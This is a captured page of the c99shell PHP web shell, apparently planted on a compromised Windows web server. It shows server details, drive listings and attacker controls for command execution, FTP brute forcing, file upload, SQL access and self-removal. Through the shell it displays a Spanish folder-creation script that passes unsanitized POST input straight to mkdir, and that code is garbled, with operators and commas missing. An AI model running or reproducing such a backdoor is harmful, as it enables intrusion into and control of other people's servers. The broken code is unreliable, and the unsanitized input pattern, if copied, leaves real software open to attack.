!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\htdocs\BLA2\boletinlegal\registro\   drwxrwxrwx
Free 9.41 GB of 239.26 GB (3.93%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     crear.php (2.31 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
// Estructura de carpeta deseada

if( $_POST['crea']){
$estructura $_POST['name']/$_POST['sales'];
$prueba $estructura;
echo 
$prueba;
// Para crear una estructura anidada se debe especificar el parámetro $recursive
// en mkdir().
if(!mkdir($estructura0true))
{
    die(
'Fallo al crear carpeta...');
}
}
// ...
?>

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
        <title>Crear Carpetas</title>

        <style type="text/css">
            @import url('assets/css/contact.css');
            @import url('assets/css/lay.css');
        .style1 {color: #FFFFFF}
        </style>

        <script type="text/javascript" src="assets/js/jquery.js"></script>
        <script type="text/javascript" src="assets/js/js.js"></script>

    </head>
    <body>
        <div id="contact">
            <div id="top">
                <h1>Creador de Carpeta</h1>
            </div>
            <div id="center">
        <div id="contact_form">
      <form method="post" action="crear.php" id="contactForm">
                <div class="error" id="error">Ha ocurrido un error en el registro y no se ha podido realizar</div>
                <div class="success" id="success">El Registro es Exitoso!<br />Gracias por registrar.</div>

                    <span class="input">
<label for="name"><b>Nombre:</b> </label>
<input  type="text" id="name" name="nombre" />
<div class="warning" id="nameError">El campo no puede estar vacio</div>
</span><span class="input">
<label for="sales"><b>Directorio:</b> </label>
<select id="sales" name="directorio">
<option value="conceptos">Conceptos</option>
<option value="autos">Autos</option>
<option value="resoluciones">Resoluciones</option>
<option value="directivas">Directivas</option>
<option value="circulares">Circulares</option>

</select>
</span><span class="input">
<label for="security_code"><b>Validación:</b> </label>

   
                    <input id="send" name="crea" type="submit" value="CREAR" />
                    </span>

                </form>
                </div>
            </div>
            <div id="bot"><!--bottom--></div>
  
        </div>
        <div align="center"><br>
          </div>
</body>
</html>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--